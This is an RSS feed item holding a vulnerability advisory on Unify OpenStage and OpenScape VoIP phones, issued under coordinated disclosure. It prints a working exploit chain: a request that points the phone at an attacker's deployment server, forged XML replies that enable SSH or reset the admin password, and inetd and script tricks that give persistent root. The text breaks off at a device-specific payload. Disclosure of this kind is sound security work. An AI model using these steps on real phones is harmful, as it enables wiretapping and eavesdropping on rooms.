<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="../../assets/xml/rss.xsl" media="all"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Pentagrid AG (Einträge über VoIP)</title><link>https://www.pentagrid.ch/</link><description></description><atom:link href="https://www.pentagrid.ch/de/categories/voip.xml" rel="self" type="application/rss+xml"></atom:link><language>de</language><copyright>Contents © 2026 Pentagrid AG </copyright><lastBuildDate>Wed, 17 Jun 2026 19:14:53 GMT</lastBuildDate><generator>Nikola (getnikola.com)</generator><docs>http://blogs.law.harvard.edu/tech/rss</docs><item><title>Remote code execution and elevation of local privileges in Mitel Unify OpenStage and OpenScape VoIP phones</title><link>https://www.pentagrid.ch/de/blog/rce-and-local-root-in-openstage-and-openscape-phones/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/202312_unify_framebuffer.jpg"&gt;&lt;/figure&gt; &lt;p&gt;During a research project, Pentagrid identified multiple vulnerabilities in the OpenStage and OpenScape VoIP phone series. The combination of insecure defaults and implementation weaknesses allows a remote compromise and the elevation of privileges for a network-local attacker on phones with an unhardened default configuration. Compromising a phone does not only allow to wiretap phone calls, but could also be abused to access microphones for listening to rooms. The vulnerabilities affect a wide range of devices. Pentagrid assumes that many small companies don't use a hardened configuration and are likely affected.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;OpenStage and OpenScape are a phone series brand originally developed by Siemens. In 2013, Siemens' devision for enterprise communication was rebranded to Unify. Unify was sold to Atos in 2016, a company that is the &lt;a class="reference external" href="https://unify.com/en/2023/news_2023_01_24/atos-enters-into-exclusive-negotiations-with-mitel"&gt;"European number one in cybersecurity"&lt;/a&gt;. During the coordinated disclosure, Atos sold Unify to Mitel.&lt;/p&gt;
&lt;p&gt;OpenStage and OpenScape phones provide an interface, which is named &lt;a class="reference external" href="https://wiki.unify.com/wiki/OpenStage_WPI"&gt;Work Point Interface (WPI)&lt;/a&gt;. This is a web-based service on the phones, where a client and the WPI exchange XML messages via HTTPS for machine to machine communication. This WPI is accessible via TCP port 8085 on the phone side. If a customer operates a large set of phones, then the the customer likely uses a deployment tool. This is called Deployment Service (DLS) or Deployment Service Light (DLI). Additionally, the phones have a web-based management (WBM) interface on port 80 and 443.&lt;/p&gt;
&lt;p&gt;In the default configuration, the Workpoint Interface does not use authentication and the phones do not verify the DLS/DLI. Any deployment tool can connect the phone to send a configuration. The DLS protocol is public and can be found via document sharing platforms under the title "OpenStage / OpenScape Desk Phone IP Provisioning Interface" with the document ID A31003-S2000-R102-16-7620, which was published 2016. This workpoint interface is used here for the initial access. Furthermore, Pentagrid identified local vulnerabilities, which an attacker can use for privilege escalation.&lt;/p&gt;
&lt;p&gt;OpenStage and OpenScape phones are Linux-based systems and quite popular in Germany. They are used in banks and public authorities. Getting initial access on OpenStage HFA phones was mentioned &lt;a class="reference external" href="https://wikileaks.org/ciav7p1/cms/page_524426.html"&gt;in the Vault 7 leak in 2013&lt;/a&gt;.&lt;/p&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2023-08-20: Initial contact of Atos Unify via &lt;a class="reference external" href="mailto:obso@atos.net"&gt;obso@atos.net&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-24: Pentagrid provided the preliminary advisory and further details.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-25: Atos replied that they will work on resolving the issues and inform about the progress.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-10-19: Phone call with product security officer about the current status and Atos' adivsory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-10-19: Atos provided a version 0.3 of the advisory to Pentagrid.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-10-25: Call with Unify leader of the product managment and product security officer.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-11-20: Planned release date according to 90 days period.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-11-27: Agreed prolongation of the release date.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-08: Deferred release date to be in line with the Unify publication.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-08: Pentagrid published this advisory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-08: Unify communicated a delay of the Unify advisory. It is expected for the 2023-12-13.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-11: Unify publishes &lt;a class="reference external" href="https://networks.unify.com/security/advisories/OBSO-2312-01.pdf"&gt;OBSO-2312-01&lt;/a&gt;. Updated references to the advisory.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="unauthenticated-wpi-allows-enabling-secure-shell-and-resetting-admin-password"&gt;
&lt;h2&gt;1.  Unauthenticated WPI allows enabling Secure Shell and resetting admin password&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, 8.8 High&lt;/pre&gt;
&lt;section id="affected-components"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 40  Version 3.5.21.0000 (Released: 2020-09-21)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 80  Version 3.3.24.0000 (Released: 2014-10-10)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.9.5.0002&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.9.0001&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;By default, the Work Point Interface on the phone does not verify the deployment service and there is no authentication mechanism. Hence, any client implementing a deployment service can connect a phone and change configuration. A remote attacker can enable the Secure Shell feature on the phone by abusing the unauthenticated Workpoint Interface. It is possible to set an attacker-defined password for the admin user, even if there was a password defined. The attacker only has to be in the same network. The WPI is active by default.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;The attacker is able to set the admin user’s password to a defined valued, enable SSH and is able to connect to the phone as user admin.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;Each phone has a Work Point Interface enabled. It is a remote management interface and this interface is accessible via the phone’s TCP port 8085. The port uses TLS for encryption. A maintenance tool can connect to a phone’s WPI interface and vice versa a phone can connect a DLS server.
An attacker can prompt the phone to contact a malicious DLS server. Therefore, an attacker sends a HTTP GET request to the phone’s web interface using this URL format:&lt;/p&gt;
&lt;pre class="literal-block"&gt;https://TARGETPHONEIP:443/contact_dls.html/ContactDLS?ContactMe=true&amp;amp;dls_ip_addr=MALICIOUSSERVER&amp;amp;dls_ip_port=MALICIOUSPORT&lt;/pre&gt;
&lt;p&gt;The web interface on port 80 and 443 is enabled by default. It is also possible to send a plain HTTP GET request to the DLS interface on Port 8085:&lt;/p&gt;
&lt;pre class="literal-block"&gt;http://TARGETPHONEIP:8085/contact_dls.html/ContactDLS?ContactMe=true&amp;amp;dls_ip_addr=MALICIOUSSERVER&amp;amp;dls_ip_port=MALICIOUSPORT&lt;/pre&gt;
&lt;p&gt;The phone then connects to the given DLS server with some configuration information and a nonce value as shown in the following snippet:&lt;/p&gt;
&lt;pre class="literal-block"&gt;POST /DeploymentService/LoginService HTTP/1.1
Host: XXXXXXXX:XXXX
Cookie: PHPSESSID=g75hrag2ksves20dbar471b8v5; path=/
Content-Type: text/xml
Content-Length: 1957
Connection: close

&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;WorkpointMessage
     xmlns="http://www.siemens.com/DLS"
     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
     xsi:schemaLocation="http://www.siemens.com/DLS"&amp;gt;
     &amp;lt;Message nonce="D5AFD7A47752175FF354867D94A61AE0" maxItems="-1"&amp;gt;
             &amp;lt;ReasonForContact&amp;gt;solicited&amp;lt;/ReasonForContact&amp;gt;
             &amp;lt;ItemList&amp;gt;
                     &amp;lt;Item name="device-type"&amp;gt;OpenScape Desk Phone CP210&amp;lt;/Item&amp;gt;
                     &amp;lt;Item name="related-device-type"&amp;gt;OpenScape Desk Phone CP210&amp;lt;/Item&amp;gt;
                     &amp;lt;Item name="gigabit-ethernet-enabled"&amp;gt;true&amp;lt;/Item&amp;gt;
                     […]&lt;/pre&gt;
&lt;p&gt;The malicious DLS server replies with an XML message that prompts the phone to enable SSH. The nonce value sent by the phone must be included in this XML message. Furthermore, the admin user’s password is forced to an attacker-known value, which is possible within the same message. An example for such a message is given below:&lt;/p&gt;
&lt;pre class="literal-block"&gt;HTTP/1.0 200 OK
Content-length: 323

&amp;lt;DLSMessage&amp;gt;
     &amp;lt;Message nonce="7AA535AE3483E8380B9338C733D6A934"&amp;gt;
             &amp;lt;Action&amp;gt;WriteItems&amp;lt;/Action&amp;gt;
     &amp;lt;/Message&amp;gt;
     &amp;lt;ItemList&amp;gt;
             &amp;lt;Item name="ssh-enable"&amp;gt;true&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="ssh-password"&amp;gt;123456&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="ssh-timer-connect"&amp;gt;10&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="ssh-timer-session"&amp;gt;60&amp;lt;/Item&amp;gt;
     &amp;lt;/ItemList&amp;gt;
&amp;lt;/DLSMessage&amp;gt;&lt;/pre&gt;
&lt;p&gt;The figure below illustrates the message flow.&lt;/p&gt;
&lt;img alt="Message flow between Phone and DLS." class="align-center" src="https://www.pentagrid.ch/images/202312_unify_message_flow.png"&gt;
&lt;p&gt;The attacker can now connect to the phone via a secure shell as an admin user with the password 123456. No authentication was needed to get here.&lt;/p&gt;
&lt;pre class="literal-block"&gt;ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oMACs=+hmac-sha1 admin@PHONEIP&lt;/pre&gt;
&lt;p&gt;In the OpenStage 80 version 2.2.47.0000 it was not possible to enable SSH directly. But using the malicious DLS server an attacker can change the admin password for the web interface of the phone if it was changed from the default password 123456. The process is similar to enabling SSH as seen above, but the content of the item list in the response of the DLS server needs to be changed to the following line.&lt;/p&gt;
&lt;pre class="literal-block"&gt;&amp;lt;Item name="admin-pwd"&amp;gt;123456&amp;lt;/Item&amp;gt;&lt;/pre&gt;
&lt;p&gt;Alternatively, an attacker could factory reset the phone via DLS to reset the admin password to 123456 automatically. Therefore, the attacker sends this message as response of the DLS server:&lt;/p&gt;
&lt;pre class="literal-block"&gt;HTTP/1.0 200 OK
Content-length: 244

&amp;lt;DLSMessage&amp;gt;
     &amp;lt;Message nonce="7AA535AE3483E8380B9338C733D6A934"&amp;gt;
             &amp;lt;Action&amp;gt;Restart&amp;lt;/Action&amp;gt;
     &amp;lt;/Message&amp;gt;
     &amp;lt;ItemList&amp;gt;
             &amp;lt;Item name="restart-password"&amp;gt;124816&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="restart-type"&amp;gt;FactoryReset&amp;lt;/Item&amp;gt;
     &amp;lt;/ItemList&amp;gt;
 &amp;lt;/DLSMessage&amp;gt;&lt;/pre&gt;
&lt;p&gt;Within this message, a factory reset password must be included in the message. It is a &lt;a class="reference external" href="https://wiki.unify.com/wiki/OpenScape_Desk_Phone_CP_FAQ"&gt;documented and publicly known&lt;/a&gt;  value. A factory reset will reboot the phone.&lt;/p&gt;
&lt;p&gt;Having admin access to the web interface, an attacker can now enable SSH as well. If the web interface was disabled, it can be reenabled via a malicious DLS message using the following item.&lt;/p&gt;
&lt;pre class="literal-block"&gt;&amp;lt;Item name="enable-WBM"&amp;gt;True&amp;lt;/Item&amp;gt;&lt;/pre&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs access to the local network and must be able to connect the WPI interface. The phone does not verify the DLS server.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="phone-does-not-verify-tls-certificate-of-dls-server-per-default"&gt;
&lt;h2&gt;2.  Phone does not verify TLS certificate of DLS server per default&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 4.3 Medium&lt;/pre&gt;
&lt;section id="affected-components-1"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 40  Version 3.5.21.0000 (Released: 2020-09-21)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 80  Version 3.3.24.0000 (Released: 2014-10-10)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-1"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;The phone does not verify the TLS certificate when connecting to the DLS server, with standard settings.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-1"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;This allows man-in-the-middle attackers to spoof a DLS connection. An attackers could also host their own DLS server with an arbitrary certificate. The phone connects to a malicous DLS server and accepts configuration.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-1"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;During the analysis it has been observed that the phone connects to DLS server, even if the server does not use a certificate that is signed by a trusted certificate authority. Instead, self-signed certificates are accepted. The phone’s debug log in &lt;code class="docutils literal"&gt;/tmp/logs/messages&lt;/code&gt; even logs that it is accepting the certificate.&lt;/p&gt;
&lt;pre class="literal-block"&gt;SvcConfig: Certificate verification error (9:certificate is not yet valid) at depth (0), ssl (0x9c2028)
Sep 29 11:27:34 (none) user.err SvcConfig: Certificate issuer  =C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
[…]
Sep 29 11:27:34 (none) user.debug SvcConfig: isVerificationSuccessful: caPath =
Sep 29 11:27:34 (none) user.notice SvcConfig: Allowed HTTPS Not Yet Valid Certificate: /C=AU/ST=Some-State/O=Internet Widgits Pty Ltd
Sep 29 11:27:34 (none) user.debug SvcConfig: SecureTransportContext::deleteVerifyError for 0x9c2028&lt;/pre&gt;
&lt;p&gt;The log indicates that certificates is not valid, but allowed.&lt;/p&gt;
&lt;p&gt;The phone's web interface defines authentication policies under Security and policies -&amp;gt; Certificates -&amp;gt; Authentication policy, but changing them does not solve the problem described in finding 1 and 2.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-1"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs to prompt the phone to contact a server without a valid certificate. Therefore, the attacker needs to be in the same network as the VoIP phone.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="secure-shell-privilege-escalation-to-root-via-writeable-files-and-directories"&gt;
&lt;h2&gt;3.  Secure Shell privilege escalation to root via writeable files and directories&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, 6.7 Medium&lt;/pre&gt;
&lt;section id="affected-components-2"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 40  Version 3.5.21.0000 (Released: 2020-09-21)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 80  Version 3.3.24.0000 (Released: 2014-10-10)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-2"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;A remote attacker with Secure Shell access as &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user is able to abuse improper file permissions to change system-relevant files.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-2"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;An attacker can escalate privileges in order to gain permanent &lt;code class="docutils literal"&gt;root&lt;/code&gt; access on the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-2"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;For example, the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user has write access to the &lt;code class="docutils literal"&gt;/etc/inetd.conf&lt;/code&gt; file and can add a script that gets executed with &lt;code class="docutils literal"&gt;root&lt;/code&gt; privileges when the phone starts. In this example, the script &lt;code class="docutils literal"&gt;test&lt;/code&gt; was added to the system and written to &lt;code class="docutils literal"&gt;/usr/local/bin/&lt;/code&gt;.&lt;/p&gt;
&lt;pre class="literal-block"&gt;telnet       stream  tcp     nowait  root    /usr/sbin/telnetd       telnetd
ftp          stream  tcp     nowait  root    /usr/sbin/ftpd          ftpd
test         stream  tcp     nowait  root    /usr/local/bin/test     test&lt;/pre&gt;
&lt;p&gt;The admin user then creates the following executable &lt;code class="docutils literal"&gt;/usr/local/bin/test&lt;/code&gt; script. The script changes the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user's password and starts the dropbear service without parameters.&lt;/p&gt;
&lt;pre class="literal-block"&gt;#!/bin/sh
/Opera_Deploy/setPasswd.sh root 123456
/usr/sbin/dropbear&lt;/pre&gt;
&lt;p&gt;In order to reload the inetd config and execute the test script on connect, the phone needs to reboot. The attacker can use a malicious DLS server as described in finding 1 to send the following response.&lt;/p&gt;
&lt;pre class="literal-block"&gt;HTTP/1.0 200 OK
Content-length: 121

&amp;lt;DLSMessage&amp;gt;
     &amp;lt;Message nonce="7AA535AE3483E8380B9338C733D6A934"&amp;gt;
             &amp;lt;Action&amp;gt;Restart&amp;lt;/Action&amp;gt;
     &amp;lt;/Message&amp;gt;
&amp;lt;/DLSMessage&amp;gt;&lt;/pre&gt;
&lt;p&gt;After the reboot, the attacker can permanently connect to the phone via SSH as &lt;code class="docutils literal"&gt;root&lt;/code&gt;. The regular invocation of the Dropbear SSH server uses the &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;-w&lt;/span&gt;&lt;/code&gt; parameter, which prevents connections for the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user, but here the SSH server is started without this restriction.&lt;/p&gt;
&lt;p&gt;The following files have improper file permission, which could be used for privilege escalation:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/usr/sbin/stunnel&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/etc/inetd.conf&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Depending on the phone's firmware version, there are more files and directories with problematic file permissions. Further above, the directory &lt;code class="docutils literal"&gt;/usr/local/bin/&lt;/code&gt; was mentioned to be writeable by the default shell user &lt;code class="docutils literal"&gt;admin&lt;/code&gt;. Files in this directory belong the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user:&lt;/p&gt;
&lt;pre class="literal-block"&gt;$ ls -l /usr/local/
drwxrwxr-x    2 admin    admin          296 Dec 25 02:54 bin
drwxrwxr-x    2 admin    admin          368 Dec 25 02:54 sbin&lt;/pre&gt;
&lt;p&gt;Depending on the firmware version and model, the directory &lt;code class="docutils literal"&gt;/usr/local/bin/&lt;/code&gt; is part of the &lt;code class="docutils literal"&gt;PATH&lt;/code&gt; environment variable and this directory has precedence over other directories, for example on an OpenStage 40 SIP:&lt;/p&gt;
&lt;pre class="literal-block"&gt;# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
# echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin:/Opera_Deploy&lt;/pre&gt;
&lt;p&gt;Another method for the elevation of privileges is to add a file &lt;code class="docutils literal"&gt;chpasswd&lt;/code&gt; there, which is then executed on password change. This password change can be triggered with the method from finding 1 and there is no need to reboot the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-2"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs SSH access to the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="writeable-framebuffer"&gt;
&lt;h2&gt;4.  Writeable framebuffer&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L, 3.4 Low&lt;/pre&gt;
&lt;section id="affected-components-3"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.9.5.0002&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.9.0001&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-3"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;An attacker with Secure Shell access as the Linux user &lt;code class="docutils literal"&gt;admin&lt;/code&gt; is able to write into the framebuffer device.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-3"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;An attacker can change the display content of the phone. Being able to specify the framebuffer content allows crafting specific content for the attack in finding 5.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-3"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;Using SSH, the admin user can write arbitrary data into the framebuffer, because the frambuffer device is writeable:&lt;/p&gt;
&lt;pre class="literal-block"&gt;$ ls -l /dev/fb0
crw-rw-rw-    1 root     root       29,   0 Dec 25 04:25 /dev/fb0
$ echo AAAAAAAAAAAAAAAAAAAA &amp;gt; /dev/fb0&lt;/pre&gt;
&lt;p&gt;An attacker could show false information on the display with a well-crafted and timed payload.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-3"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs code execution permission on the phone, for example via SSH access.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="openscape-secure-shell-privilege-escalation-to-root-via-setuid-programs"&gt;
&lt;h2&gt;5. OpenScape – Secure Shell Privilege escalation to root via SetUID programs&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, 6.7 Medium&lt;/pre&gt;
&lt;section id="affected-components-4"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-4"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;An attacker with Secure Shell access as &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user is able to abuse SetUID permissions to change system-relevant files.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-4"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;An attacker can escalate privileges in order to gain permanent &lt;code class="docutils literal"&gt;root&lt;/code&gt; access on the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-4"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;The following files have the SUID bit set:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/sbin/fw_printenv&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/Opera_Deploy/appWeb/web/fbshot.exe&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The files are owned by the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user and therefore get executed with &lt;code class="docutils literal"&gt;root&lt;/code&gt; privileges even when run by the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user.&lt;/p&gt;
&lt;p&gt;The &lt;code class="docutils literal"&gt;fbshot.exe&lt;/code&gt; creates a screenshot of the display. It takes the content of the framebuffer and creates a BMP file. The &lt;code class="docutils literal"&gt;/dev/fb&lt;/code&gt; framebuffer is used as default, but it is possible to specify another framebuffer device as a parameter. As seen in finding 4, the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user can write into &lt;code class="docutils literal"&gt;/dev/fb0&lt;/code&gt;. Using the SetUID program &lt;code class="docutils literal"&gt;fbshot.exe&lt;/code&gt;, it is possible to overwrite arbitrary files on the system, which has a Denial of Service effect.&lt;/p&gt;
&lt;p&gt;While the output files are BMP files in the first place. However, by carefully crafting a buffer, writing the buffer to the framebuffer and using the framebuffer screenshot tool, is is also possible to write files that are more or less valid script files. As long as the attacker-specified code is run, it does not matter if the script fails with a syntax error afterwards, for example due to unbalanced brackets on a line.&lt;/p&gt;
&lt;p&gt;Payloads depend on the frambeuffer size and are therefore device-specific. A possible payload for a CP210 is:&lt;/p&gt;
&lt;pre class="literal-block"&gt;/home/admin/myscript
